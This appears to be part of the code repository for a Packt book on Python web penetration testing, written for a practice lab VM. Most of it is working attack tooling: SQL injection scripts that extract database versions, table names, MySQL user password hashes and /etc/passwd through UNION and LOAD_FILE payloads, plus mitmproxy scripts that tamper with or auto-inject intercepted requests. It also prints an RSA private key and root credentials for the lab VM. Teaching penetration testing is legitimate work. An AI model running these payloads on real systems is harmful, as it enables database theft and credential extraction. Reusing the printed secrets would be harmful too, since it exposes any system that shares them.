106 | req=requests.get(new_url)
107 | raw = req.content
108 | reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
109 | version=re.findall(reg,req.content)
110 | for ver in version:
111 | print ver
112 | return ver
113 |
114 | def detect_user(url):
115 | new_url= url.replace("FUZZ","\'%20union%20SELECT%201,CONCAT('TOK',user(),'TOK')--%20-")
116 | req=requests.get(new_url)
117 | raw = req.content
118 | reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
119 | users=re.findall(reg,req.content)
120 | for user in users:
121 | print user
122 | return user
123 |
124 | def steal_users(url):
125 | new_url= url.replace("FUZZ","1\'%20union%20SELECT%20CONCAT('TOK',user,'TOK'),CONCAT('TOK',password,'TOK')%20FROM%20mysql.user--%20-")
126 | req=requests.get(new_url)
127 | reg = ur"TOK([\*a-zA-Z0-9].+?)TOK+?"
128 | users=re.findall(reg,req.content)
129 | for user in users:
130 | print user
131 |
132 |
133 | def detect_table_names(url):
134 | new_url= url.replace("FUZZ","""\'%20union%20SELECT%20CONCAT('TOK',
135 | table_schema,'TOK'),CONCAT('TOK',table_name,'TOK')%20FROM
136 | %20information_schema.tables%20WHERE%20table_schema%20!=%20
137 | %27mysql%27%20AND%20table_schema%20!=%20%27information_schema%27
138 | %20and%20table_schema%20!=%20%27performance_schema%27%20--%20-""")
139 | req=requests.get(new_url)
140 | raw = req.content
141 | reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
142 | tables=re.findall(reg,req.content)
143 | for table in tables:
144 | print table
145 |
146 |
def detect_columns_names(url):
    """Try common column names via GROUP BY probing; return those accepted
    (i.e. whose response does not contain "Unknown")."""
    candidates = ['username','user','name','pass','passwd','password','id','role','surname','address']
    probe = url.replace("FUZZ", "admin' group by X-- -")
    return [col for col in candidates
            if requests.get(probe.replace("X", col)).content.find("Unknown") == -1]
158 |
if __name__ == "__main__":
    # Entry point: strip the program name and hand the CLI args to start().
    try:
        start(sys.argv[1:])
    except KeyboardInterrupt:
        # Last-resort Ctrl+C handler.
        print "SQLinjector interrupted by user..!!"
164 |
--------------------------------------------------------------------------------
/Examples/Chapter06/Section-6/SQLinjector-4.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import sys
3 | import getopt
4 | import re
5 | from termcolor import colored
6 |
7 |
8 | def banner():
9 | print "\n***************************************"
10 | print "* SQlinjector 1.0 *"
11 | print "***************************************"
12 |
13 | def usage():
14 | print "Usage:"
15 | print " -w: url (http://somesite.com/news.php?id=FUZZ)\n"
16 | print " -i: injection strings file \n"
17 | print "example: SQLinjector.py -w http://www.somesite.com/news.php?id=FUZZ \n"
18 |
19 |
20 | def start(argv):
21 | banner()
22 | if len(sys.argv) < 2:
23 | usage()
24 | sys.exit()
25 | try:
26 | opts, args = getopt.getopt(argv,"w:i:")
27 | except getopt.GetoptError:
28 | print "Error en arguments"
29 | sys.exit()
30 | for opt,arg in opts :
31 | if opt == '-w' :
32 | url=arg
33 | elif opt == '-i':
34 | dictio = arg
35 | try:
36 | print "[-] Opening injections file: " + dictio
37 | f = open(dictio, "r")
38 | name = f.read().splitlines()
39 | except:
40 | print"Failed opening file: "+ dictio+"\n"
41 | sys.exit()
42 | launcher(url,name)
43 |
def launcher (url,dictio):
    # Orchestrates the whole scan in order: error-based detection, column
    # enumeration, DB fingerprinting, table discovery, credential
    # extraction, and finally a file read via the injection.
    injected = []

    for x in dictio:
        sqlinjection=x
        injected.append(url.replace("FUZZ",sqlinjection))
    res = injector(injected)

    print colored('[+] Detection results:','green')
    print "------------------"
    for x in res:
        # Each entry is "url;signature" -- show only the URL part.
        print x.split(";")[0]

    print colored ('[+] Detect columns: ','green')
    print "-----------------"
    res = detect_columns(url)
    print "Number of columns: " + res
    # 'res' is reused: now a list of valid column names.
    res = detect_columns_names(url)

    print "[+] Columns names found: "
    print "-------------------------"
    for col in res:
        print col

    print colored('[+] DB version: ','green')
    print "---------------"
    detect_version(url)

    print colored('[+] Current USER: ','green')
    print "---------------"
    detect_user(url)


    print colored('[+] Get tables names:','green')
    print "---------------------"
    detect_table_names(url)

    print colored('[+] Attempting MYSQL user extraction','green')
    print "-------------------------------------"
    steal_users(url)

    # Attempt to read a server-side file through the injection.
    # NOTE(review): read_file() is defined later in this file, outside the
    # visible chunk.
    filename="/etc/passwd"
    message = "\n[+] Reading file: " + filename
    print colored(message,'green')
    print "---------------------------------"
    read_file(url,filename)
90 |
91 | def injector(injected):
92 | errors = ['Mysql','error in your SQL']
93 | results = []
94 | for y in injected:
95 | print "[-] Testing errors: " + y
96 | req=requests.get(y)
97 | for x in errors:
98 | if req.content.find(x) != -1:
99 | res = y + ";" + x
100 | results.append(res)
101 | return results
102 |
def detect_columns(url, max_columns=20):
    """Count the columns of the injected query via ORDER BY probing.

    Increments the ORDER BY index until the response contains "Unknown"
    (MySQL's "Unknown column" error). max_columns caps the probing
    (default 20, matching the original hard-coded limit).

    Returns the count as a string; if the cap is reached without an
    error the result is max_columns - 1 and may be an underestimate.
    """
    probe = url.replace("FUZZ", "admin' order by X-- -")
    count = 1
    while count < max_columns:
        req = requests.get(probe.replace("X", str(count)))
        if req.content.find("Unknown") == -1:
            count += 1
        else:
            break
    return str(count - 1)
113 |
114 | def detect_version(url):
115 | new_url= url.replace("FUZZ","\'%20union%20SELECT%201,CONCAT('TOK',@@version,'TOK')--%20-")
116 | req=requests.get(new_url)
117 | raw = req.content
118 | reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
119 | version=re.findall(reg,req.content)
120 | for ver in version:
121 | print ver
122 | return ver
123 |
124 | def detect_user(url):
125 | new_url= url.replace("FUZZ","\'%20union%20SELECT%201,CONCAT('TOK',user(),'TOK')--%20-")
126 | req=requests.get(new_url)
127 | raw = req.content
128 | reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
129 | users=re.findall(reg,req.content)
130 | for user in users:
131 | print user
132 | return user
133 |
134 | def steal_users(url):
135 | new_url= url.replace("FUZZ","1\'%20union%20SELECT%20CONCAT('TOK',user,'TOK'),CONCAT('TOK',password,'TOK')%20FROM%20mysql.user--%20-")
136 | req=requests.get(new_url)
137 | reg = ur"TOK([\*a-zA-Z0-9].+?)TOK+?"
138 | users=re.findall(reg,req.content)
139 | for user in users:
140 | print user
141 |
142 | def read_file(url, filename):
143 | new_url= url.replace("FUZZ","""A\'%20union%20SELECT%201,CONCAT('TOK',
144 | LOAD_FILE(\'"+filename+"\'),'TOK')--%20-""")
145 | req=requests.get(new_url)
146 | reg = ur"TOK(.+?)TOK+?"
147 | files= re.findall(reg,req.content)
148 | print req.content
149 | for x in files:
150 | if not x.find('TOK,'):
151 | print x
152 |
153 | def detect_table_names(url):
154 | new_url= url.replace("FUZZ","\'%20union%20SELECT%20CONCAT('TOK',table_schema,'TOK'),CONCAT('TOK',table_name,'TOK')%20FROM%20information_schema.tables%20WHERE%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema%27%20and%20table_schema%20!=%20%27performance_schema%27%20--%20-")
155 | req=requests.get(new_url)
156 | raw = req.content
157 | reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
158 | tables=re.findall(reg,req.content)
159 | for table in tables:
160 | print table
161 |
162 |
def detect_columns_names(url, column_names=None):
    """Guess valid column names of the injected query via GROUP BY probing.

    For each candidate name, a GROUP BY <name> probe is sent; if the
    response does not contain "Unknown" (MySQL's "Unknown column" error)
    the name is considered valid.

    column_names: optional list of candidates; defaults to the original
    built-in wordlist so existing callers are unaffected.
    Returns the list of names that appear to exist.
    """
    if column_names is None:
        column_names = ['username','user','name','pass','passwd','password','id','role','surname','address']
    probe = url.replace("FUZZ", "admin' group by X-- -")
    valid_cols = []
    for name in column_names:
        req = requests.get(probe.replace("X", name))
        if req.content.find("Unknown") == -1:
            valid_cols.append(name)
    return valid_cols
174 |
if __name__ == "__main__":
    # Entry point: forward everything after the script name to the option parser.
    try:
        start(sys.argv[1:])
    except KeyboardInterrupt:
        # Let Ctrl-C abort the scan cleanly instead of dumping a traceback.
        print "SQLinjector interrupted by user..!!"
180 |
--------------------------------------------------------------------------------
/Examples/Chapter06/Section-6/injections.txt:
--------------------------------------------------------------------------------
1 | '
2 | "
3 | /
4 | /*
5 | #
6 | )
7 | (
8 | )'
9 | ('
10 | and 1=1
11 | and 1=2
12 | and 1>2
13 | and 1<2
14 |
--------------------------------------------------------------------------------
/Examples/Chapter07/Section-7/mitm-0.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
def request(context, flow):
    """mitmproxy hook: append the URL of every intercepted request to
    httplogs.txt, one URL per line.

    Uses a with-block so the file handle is closed even if the write fails
    (the original left it open on an exception between open and close).
    """
    with open('httplogs.txt', 'a+') as f:
        f.write(flow.request.url + '\n')
7 |
--------------------------------------------------------------------------------
/Examples/Chapter07/Section-7/mitm-1.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
# URLs already logged in this proxy session; module-level so the state is
# shared across hook invocations. (The original's module-level `global`
# statement was a no-op and has been dropped.)
history = []

def request(context, flow):
    """mitmproxy hook: append each distinct request URL to httplogs.txt
    exactly once, tracking seen URLs in the module-level `history` list."""
    global history
    url = flow.request.url
    if url in history:
        return
    # with-block guarantees the handle is closed even if the write fails.
    with open('httplogs.txt', 'a+') as f:
        f.write(url + '\n')
    history.append(url)
16 |
--------------------------------------------------------------------------------
/Examples/Chapter07/Section-7/mitm-2.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
def request(context, flow):
    """mitmproxy hook: tag every request that carries query-string
    parameters with an extra isadmin=True parameter before forwarding."""
    params = flow.request.get_query()
    if not params:
        return  # nothing to tamper with on parameterless requests
    params["isadmin"] = ["True"]
    flow.request.set_query(params)
8 |
--------------------------------------------------------------------------------
/Examples/Chapter07/Section-7/mitm-3.py:
--------------------------------------------------------------------------------
1 | import urlparse
2 | from copy import deepcopy
3 | import requests
4 | import sys
5 |
6 |
7 |
8 | def injector (url):
9 | errors = ['Mysql','error in your SQL']
10 | injections = ['\'','\"',';--']
11 | f = open('sqlinjection_results.txt','a+')
12 | a = urlparse.urlparse(url)
13 | query = a.query.split('&')
14 | qlen = len(query)
15 | while qlen != 0:
16 | querys = deepcopy(query)
17 | querys[qlen-1] = querys[qlen-1].split('=')[0] + '=FUZZ'
18 | newq='&'.join(querys)
19 | url_to_test = a.scheme+'://'+a.netloc+a.path+'?'+newq
20 | qlen-=1
21 | for inj in injections:
22 | req=requests.get(url_to_test.replace('FUZZ',inj))
23 | print req.content
24 | for err in errors:
25 | if req.content.find(err) != -1:
26 | res = req.url + ";" + err
27 | f.write(res)
28 | f.close()
29 |
30 | def request(context, flow):
31 | q = flow.request.get_query()
32 | print q
33 | if q:
34 | injector(flow.request.url)
35 | flow.request.set_query(q)
36 |
37 |
38 |
--------------------------------------------------------------------------------
/Examples/Chapter07/Section-7/sslcaudit.0/tmpq8l6su-cert.pem:
--------------------------------------------------------------------------------
1 | Certificate:
2 | Data:
3 | Version: 4 (0x3)
4 | Serial Number: 1 (0x1)
5 | Signature Algorithm: sha1WithRSAEncryption
6 | Issuer: CN=www.example.com, C=BE, O=Gremwell bvba
7 | Validity
8 | Not Before: Jan 1 00:00:00 1970 GMT
9 | Not After : Jan 19 03:14:07 2038 GMT
10 | Subject: CN=www.example.com, C=BE, O=Gremwell bvba
11 | Subject Public Key Info:
12 | Public Key Algorithm: rsaEncryption
13 | Public-Key: (1024 bit)
14 | Modulus:
15 | 00:de:b9:0e:76:88:ff:e6:c4:85:91:51:97:e3:f7:
16 | 55:15:cf:80:7a:c0:f1:b8:70:58:ca:aa:8d:ac:3c:
17 | f1:28:56:3e:34:30:14:2c:20:9c:cb:ce:72:2d:66:
18 | d7:97:fc:64:97:89:4d:3c:ec:2c:f2:b2:fa:b0:d5:
19 | 88:42:54:37:e0:29:4f:8b:b6:eb:c0:93:ab:94:48:
20 | 40:c5:07:5a:f7:ae:e2:78:bd:d9:bd:64:41:3a:65:
21 | ad:e2:82:6c:23:6e:aa:6a:18:84:f0:1c:cb:5a:7c:
22 | 04:42:97:22:cb:21:80:45:95:5e:52:54:67:71:d5:
23 | 6f:b3:0f:c9:fc:c9:4c:b1:b7
24 | Exponent: 65537 (0x10001)
25 | Signature Algorithm: sha1WithRSAEncryption
26 | 1f:0b:a1:76:1a:c0:ed:e4:7c:77:b0:4e:e0:7e:17:7c:da:69:
27 | 8d:14:15:63:bd:a6:76:cc:e9:de:d8:29:8e:2e:0b:8e:8a:ec:
28 | ce:6e:4c:c9:5a:b5:57:54:11:53:7b:81:cd:b6:56:cb:d3:91:
29 | 9e:b7:e5:a7:d8:e6:46:11:84:d9:06:d2:b4:6a:fb:6f:6d:3e:
30 | 98:15:5f:c9:f4:1c:9c:f1:6f:13:ce:fd:51:94:d2:57:24:48:
31 | 25:a4:d3:f9:1c:78:c2:61:fc:12:a9:2a:95:dd:59:8c:58:69:
32 | ae:39:76:34:ac:ce:63:18:70:2c:73:a5:74:da:00:48:2d:93:
33 | 0e:3d
34 | -----BEGIN CERTIFICATE-----
35 | MIIB8jCCAVugAwIBAwIBATANBgkqhkiG9w0BAQUFADA/MRgwFgYDVQQDDA93d3cu
36 | ZXhhbXBsZS5jb20xCzAJBgNVBAYTAkJFMRYwFAYDVQQKDA1HcmVtd2VsbCBidmJh
37 | MB4XDTcwMDEwMTAwMDAwMFoXDTM4MDExOTAzMTQwN1owPzEYMBYGA1UEAwwPd3d3
38 | LmV4YW1wbGUuY29tMQswCQYDVQQGEwJCRTEWMBQGA1UECgwNR3JlbXdlbGwgYnZi
39 | YTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA3rkOdoj/5sSFkVGX4/dVFc+A
40 | esDxuHBYyqqNrDzxKFY+NDAULCCcy85yLWbXl/xkl4lNPOws8rL6sNWIQlQ34ClP
41 | i7brwJOrlEhAxQda967ieL3ZvWRBOmWt4oJsI26qahiE8BzLWnwEQpciyyGARZVe
42 | UlRncdVvsw/J/MlMsbcCAwEAATANBgkqhkiG9w0BAQUFAAOBgQAfC6F2GsDt5Hx3
43 | sE7gfhd82mmNFBVjvaZ2zOne2CmOLguOiuzObkzJWrVXVBFTe4HNtlbL05Get+Wn
44 | 2OZGEYTZBtK0avtvbT6YFV/J9Byc8W8Tzv1RlNJXJEglpNP5HHjCYfwSqSqV3VmM
45 | WGmuOXY0rM5jGHAsc6V02gBILZMOPQ==
46 | -----END CERTIFICATE-----
47 |
--------------------------------------------------------------------------------
/Examples/Chapter07/Section-7/sslcaudit.0/tmpq8l6su-key.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN RSA PRIVATE KEY-----
2 | MIICXQIBAAKBgQDeuQ52iP/mxIWRUZfj91UVz4B6wPG4cFjKqo2sPPEoVj40MBQs
3 | IJzLznItZteX/GSXiU087Czysvqw1YhCVDfgKU+LtuvAk6uUSEDFB1r3ruJ4vdm9
4 | ZEE6Za3igmwjbqpqGITwHMtafARClyLLIYBFlV5SVGdx1W+zD8n8yUyxtwIDAQAB
5 | AoGAV63yi6eTVn23N2YvrYcI7/UoVyrt/fX8fox2CYBUT9Tj2Be1WUndcD5tpIIA
6 | Dc1GrIFY7srrRwA+wK7PXY1aESDKCY9sFowH3ZwdM1VG2Sn3yCRFqEfDfnrn4iMm
7 | X4jL6vWyn9bQGUjY9ofDvDGtE3JkxOrM+ybfFz7ii61x08ECQQD+5AYAUGgl/8XQ
8 | toeCC8aaLWbUMtjRkPG9ndkIbgi0ihcXkR8Sp+0LNkx3HPBCP62LCMTW/n3UejaF
9 | i6M9GCPdAkEA37Exy1kprCinnFgoOOyeD7Jt8/4+sdjxl7oEw1WiPJesm4doe2n+
10 | xpeDValCQBVH84zO0uIbatRTC2B1LAWMowJBAMbYrtHZ6JYUZoc/jpFmjGZFGx5a
11 | GInM8LpDhUgtRz9JJ2CsRzhvpt6DWr3l5o1YThPUIHO1EAcN3LDsUcncpkUCQQDK
12 | bmSNjYb00WW9Sto7iYYQ1nxCjhbWg2k+0Yx16Q0EoI4HwaZ/6RAzT/H+l0npDFks
13 | woR4uz3sk3EDnqrqx6rZAkAL4SVmorz66uaWSkItgbDnJCUiu4UOCR+mVNAasFXD
14 | ZXPYrCS4IrK59tiZ5+WD9ZnSQrYii8Sx3qTSg5MsmqUk
15 | -----END RSA PRIVATE KEY-----
16 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2017 Packt
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | # Learning Python Web Penetration Testing
5 |
6 |
7 |
8 | This is the code repository for [Learning Python Web Penetration Testing](https://www.packtpub.com/networking-and-servers/learning-python-web-penetration-testing?utm_source=github&utm_medium=repository&utm_campaign=9781789533972), published by Packt.
9 |
10 | **Automate web penetration testing activities using Python**
11 |
12 | ## What is this book about?
13 | Web penetration testing is the use of tools and code to attack a website or web app in order to assess its vulnerability to external threats. While there are an increasing number of sophisticated, ready-made tools to scan systems for vulnerabilities, the use of Python allows you to write system-specific scripts, or alter and extend existing testing tools to find, exploit, and record as many security weaknesses as possible. Learning Python Web Penetration Testing will walk you through the web application penetration testing methodology, showing you how to write your own tools with Python for each activity throughout the process. The book begins by emphasizing the importance of knowing how to write your own tools with Python for web application penetration testing. You will then learn to interact with a web application using Python, understand the anatomy of an HTTP request, URL, headers and message body, and later create a script to perform a request, and interpret the response and its headers. As you make your way through the book, you will write a web crawler using Python and the Scrapy library. The book will also help you to develop a tool to perform brute force attacks in different parts of the web application. You will then discover more on detecting and exploiting SQL injection vulnerabilities. By the end of this book, you will have successfully created an HTTP proxy based on the mitmproxy tool.
14 |
15 | This book covers the following exciting features:
16 | * Interact with a web application using the Python and Requests libraries
17 | * Create a basic web application crawler and make it recursive
18 | * Develop a brute force tool to discover and enumerate resources such as files and directories
19 | * Explore different authentication methods commonly used in web applications
20 | * Enumerate table names from a database using SQL injection
21 |
22 | If you feel this book is for you, get your [copy](https://www.amazon.com/dp/178953397X) today!
23 |
24 |
26 |
27 |
28 | ## Instructions and Navigations
29 | All of the code is organized into folders. For example, Chapter02.
30 |
31 | The code will look like the following:
32 | ```
33 | import requests
34 | payload= {'url':'http://www.edge-security.com'}
35 | r=requests.get('http://httpbin.org/redirect-to',params=payload)
36 | print "Status code:"
37 | ```
38 |
39 | **Following is what you need for this book:**
40 | Learning Python Web Penetration Testing is for web developers who want to step into the world of web application security testing. Basic knowledge of Python is necessary.
41 |
42 | With the following software and hardware list you can run all code files present in the book (Chapter 2-7).
43 |
44 | ### Software and Hardware List
45 |
46 | | Chapter | Software required | OS required |
47 | | -------- | ------------------------------------| -----------------------------------|
48 | | 2-7 | VirtualBox | Windows, Mac OS X, Linux, and Solaris |
49 |
50 |
51 |
52 | We also provide a PDF file that has color images of the screenshots/diagrams used in this book. [Click here to download it](https://www.packtpub.com/sites/default/files/downloads/LearningPythonWebPenetrationTesting_ColorImages.pdf).
53 |
54 | ### Related products
55 | * Web Penetration Testing with Kali Linux - Third Edition [[Packt]](https://www.packtpub.com/networking-and-servers/web-penetration-testing-kali-linux-third-edition?utm_source=github&utm_medium=repository&utm_campaign=9781788623377) [[Amazon]](https://www.amazon.com/dp/1788623371)
56 |
57 | * Python Penetration Testing Cookbook [[Packt]](https://www.packtpub.com/networking-and-servers/python-penetration-testing-cookbook?utm_source=github&utm_medium=repository&utm_campaign=9781784399771) [[Amazon]](https://www.amazon.com/dp/1784399779)
58 |
59 | ## Get to Know the Author
60 | **Christian Martorella**
61 | Christian Martorella has been working in the field of information security for the last 18 years and is currently leading the product security team for Skyscanner. Earlier, he was the principal program manager in the Skype product security team at Microsoft. His current focus is security engineering and automation. He has contributed to open source security testing tools such as Wfuzz, theHarvester, and Metagoofil, all included in Kali, the penetration testing Linux distribution.
62 |
63 |
64 |
65 | ### Suggestions and Feedback
66 | [Click here](https://docs.google.com/forms/d/e/1FAIpQLSdy7dATC6QmEL81FIUuymZ0Wy9vH1jHkvpY57OiMeKGqib_Ow/viewform) if you have any feedback or suggestions.
67 |
--------------------------------------------------------------------------------
/VM-info.txt:
--------------------------------------------------------------------------------
1 | VM link: https://drive.google.com/file/d/0ByatLxAqtgoqckVEeGZ4TE1faVE/view?usp=sharing&resourcekey=0-RgdNBlO6jpJK_9pMSc84uw
2 |
3 | OS user: root:packt2016
4 | Phpmyadmin: 127.0.0.1/phpmyadmin -> root:packt2026
5 | URL vulnerable application: http://www.scruffybank.com (from inside the VM)
6 |
7 |
--------------------------------------------------------------------------------